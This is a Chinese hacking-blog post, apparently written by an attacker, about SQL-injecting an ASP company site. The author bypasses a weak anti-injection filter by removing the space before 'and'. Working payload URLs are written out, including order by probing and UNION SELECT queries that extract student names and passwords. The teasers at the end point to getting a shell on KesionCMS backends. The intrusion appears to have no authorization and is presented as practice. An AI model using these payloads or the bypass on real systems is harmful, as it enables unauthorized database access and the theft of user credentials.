记一次绕过垃圾防注入系统过程

hacker5年前黑客文章749

今天无聊在帮一个站做渗透测试的时候,旁注找到一个asp企业站,asp好站拿点嘛,所以还是非常开心的,其中一个asp站,有这样的链接:

http://www.xxx.cn/news_list.asp?news_id=1165

目测一般都有漏洞,加个单引号看看,啪地弹出一个框,尿都吓出来了

20121130123849523

现在好多的ASP网站由于都存在注入等问题,于是都装备了这种先进的注入系统,所以你一般看到有反注入系统的站后面都是存在注入漏洞的,能bypass反注入就搞定了,不过一般这些反注入系统都很垃圾,很多没有过滤cookie注入,或者随便改下注入语句就能绕过了,下面的烂大街语句肯定都被拦截了。

http://www.xxx.cn/news_list.asp?news_id=1165 and 1=1

http://www.xxx.cn/news_list.asp?news_id=1165 and 1=2

http://www.xxx.com /news_list.asp?news_id=1165 and 666=666

让我感到震撼的是,居然order by 没有拦截,完全是一个没有节操的防注入系统啊,用order by确定了字段数是9,过滤了and,采用编码绕过也没有成功,试了几次,我发现它过滤的特征是”空格+and“,那么我们索性不要空格了,直接这样写:

http://www.xxx.cn/news_list.asp?news_id=1165and 1=1

http://www.xxx.cn/news_list.asp?news_id=1165and 1=2

嘿嘿嘿, *** 了吧,成功绕过了,网上说的绕过技巧很多,可是好像没有提过这种 *** ,虽然绕过了可惜猜不出管理员表,只猜出了用户表,union一下,还是可以查出来的。

http://www.xxx.cn/news_list.asp?news_id=1165and 1=2 union select 1,2,3,4,5,6,7,8,9 from student

http://www.xxx.cn/news_list.asp?news_id=1165and 1=2 union select 1,2,student_name,4,5,6,student_password,8,9 from student

20121212004985435

2012121201289091 (1)

对它的库也没兴趣,纯属练手而已,完。

标签: 黑客技术

相关文章

我的Windows2008的ip详细地址是192.168

我的Windows2008的ip详细地址是192.168

因为端口转发的牵涉到的专业知识和专用工具过多,因此大家分篇数而言,这篇主要讲讲该机的2个端口号中间怎样相互之间分享?里面的技术性倒是非常简单,你不用担心你学不懂。   因为端口转发一般是分...

Nexpose许可证书密匙key能够数次应用吗?

Nexpose许可证书密匙key能够数次应用吗?

许多情况下我们在windows上安裝了Nexpose,可是都会碰到那样或那般的难题,我是一样的,我将我所碰到的难题小结出去共享给各位朋友们!   难题1、浏览 https://localh...

SQLNinja是否适用全部电脑操作系统?

SQLNinja是否适用全部电脑操作系统?

什么叫SQL Ninja? Sql Ninja使客户可以运用应用Microsoft SQL网络服务器做为其数据库查询后端Web程序运行。它致力于在远程控制服务器上获得运作的shell。一旦发觉了SQ...

一般通用性web程序流程

一般通用性web程序流程

一般通用性web程序流程是假如想要知道域名并不是一件简易的事儿,假如用一个固定不动的URI来做为网站域名会出现各种各样不便。开发者一般是依靠HTTP Host header(例如在php里是_SER...

Keepass是不是适用全部电脑操作系统?

Keepass是不是适用全部电脑操作系统?

什么叫Keepass? Keepass是互联网技术中能用的密码管理器之一。它能够储存很多能够根据一个主密码解锁的登陆密码。这仅仅记牢一个高品质的登陆密码,而且依然能够为不一样的账号应用唯一的登陆密码...

科讯kesioncms 5.5以下漏洞后台拿shell

科讯kesioncms 5.5以下漏洞后台拿shell

科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码,而认证码没有保存在数据库而是保存在asp文件中,所以在某种程度上增...